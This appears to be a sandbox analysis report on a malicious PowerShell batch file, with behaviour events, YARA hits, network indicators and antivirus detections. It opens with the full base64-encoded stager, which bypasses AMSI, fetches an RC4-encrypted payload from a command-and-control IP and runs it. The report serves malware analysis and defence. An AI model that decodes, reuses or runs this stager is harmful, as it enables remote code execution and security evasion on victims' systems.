HAGUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQB0AEYASQBFAEwAZAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAVQBFACgAJABuAFUAbABsACwAJABUAFIAdQBlACkAOwB9ADsAWwBTAFkAUwBUAGUATQAuAE4AZQBUAC4AUwBFAHIAdgBJAGMARQBQAE8ASQBuAFQATQBBAG4AQQBnAGUAcgBdADoAOgBFAFgAcABlAEMAVAAxADAAMABDAE8ATgBUAGkATgBVAGUAPQAwADsAJAA1ADYANgA9AE4ARQB3AC0ATwBCAEoAZQBDAHQAIABTAHkAcwBUAGUAbQAuAE4ARQB0AC4AVwBlAEIAQwBMAEkAZQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AFQALgBFAE4AQwBPAEQASQBOAEcAXQA6ADoAVQBOAEkAQwBvAGQAZQAuAEcAZQBUAFMAdAByAGkAbgBHACgAWwBDAE8AbgB2AGUAUgBUAF0AOgA6AEYAcgBvAG0AQgBBAFMARQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkADUANgA2AC4ASABlAGEARABlAFIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQANQA2ADYALgBQAFIATwB4AHkAPQBbAFMAeQBzAFQAZQBtAC4ATgBFAHQALgBXAGUAQgBSAGUAcQBVAEUAUwB0AF0AOgA6AEQAZQBmAGEAVQBMAFQAVwBFAGIAUAByAG8AeABZADsAJAA1ADYANgAuAFAAcgBPAHgAeQAuAEMAcgBFAGQAZQBOAFQASQBhAEwAcwAgAD0AIABbAFMAeQBTAFQAZQBNAC4ATgBFAFQALgBDAFIARQBEAGUAbgB0AGkAQQBMAEMAQQBDAGgARQBdADoAOgBEAGUARgBhAFUAbAB0AE4AZQBUAHcAbwByAEsAQwBSAEUAZABlAE4AVABJAGEATABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkADUANgA2AC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAFkAcwB0AGUATQAuAFQAZQBYAFQALgBFAG4AYwBvAEQAaQBOAEcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgBZAHQAZQBTACgAJwBvACoAUwAvAFIAdgBdAFsAWQAxAEoAWgA/ADgAcQBLADMATQBrAHQAQAA9AEIANwBsAGgAPgBDAEkALABQADIAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBOAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgBYAE8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAA1ADYANgAuAEgARQBBAEQARQByAHMALgBBAGQARAAoACIAQwBvAG8AawBpAGUAIgAsACIATQBUAGoAWQBpAEkAZQA9AHMALwBZADcAcwAvAEkAMQBaAFQAZgBEADUARQBEAEQAcABUADYANABtAEQATgBNAFQAYwBvAD0AIgApADsAJABEAGEAVABhAD0AJAA1ADYANgAuAEQAbwB3AG4AbABPAGEAZABEAGEAVABhACgAJABzAEUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAYQBUAEEAPQAkAEQAQQB0AGEAWwA0AC4ALgAkAEQAYQBUAGEALgBMAGUATgBnAHQAaABdADsALQBqAG8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQB0AEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 12, 2024, 9:41 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 12, 2024, 9:41 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Communicates with host for which no DNS query was performed (1 event)

host

193.117.208.148

Creates a suspicious Powershell process (1 event)

option

-nop

value

Does not load current user profile

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

193.117.208.148:7800

File has been identified by 30 AntiVirus engines on VirusTotal as malicious (30 events)

Lionic	Trojan.PowerShell.Generic.4!c
McAfee	PS/Dropper.f
VIPRE	Trojan.GenericKD.62717939
Arcabit	Trojan.Generic.D3BCFFF3
Symantec	Trojan.Malscript!gen8
ESET-NOD32	PowerShell/TrojanDownloader.Agent.ABM
Avast	Other:Malware-gen [Trj]
Cynet	Malicious (score: 99)
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Trojan.GenericKD.62717939
NANO-Antivirus	Trojan.Text.Downloader.inbiqr
MicroWorld-eScan	Trojan.GenericKD.62717939
Ad-Aware	Trojan.GenericKD.62717939
Emsisoft	Trojan.GenericKD.62717939 (B)
Comodo	TrojWare.Win32.BadShell.XSN@7pmib7
DrWeb	PowerShell.DownLoader.510
McAfee-GW-Edition	PS/Dropper.f
FireEye	Trojan.GenericKD.62717939
Sophos	ATK/PSDL-D
Ikarus	Trojan-Downloader.PowerShell.Agent
Avira	TR/PowerShell.Gen
Microsoft	VirTool:PowerShell/Empire.gen!A
ViRobot	HTML.Z.Agent.5088
GData	Script.Trojan.Agent.5CS8B5
Google	Detected
AhnLab-V3	Backdoor/PowerShell.Empire.S1597
Tencent	Heur:Trojan.Powershell.Generic.u
MAX	malware (ai score=89)
Fortinet	PowerShell/Agent.ABM!tr
AVG	Other:Malware-gen [Trj]

Blogger-http.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All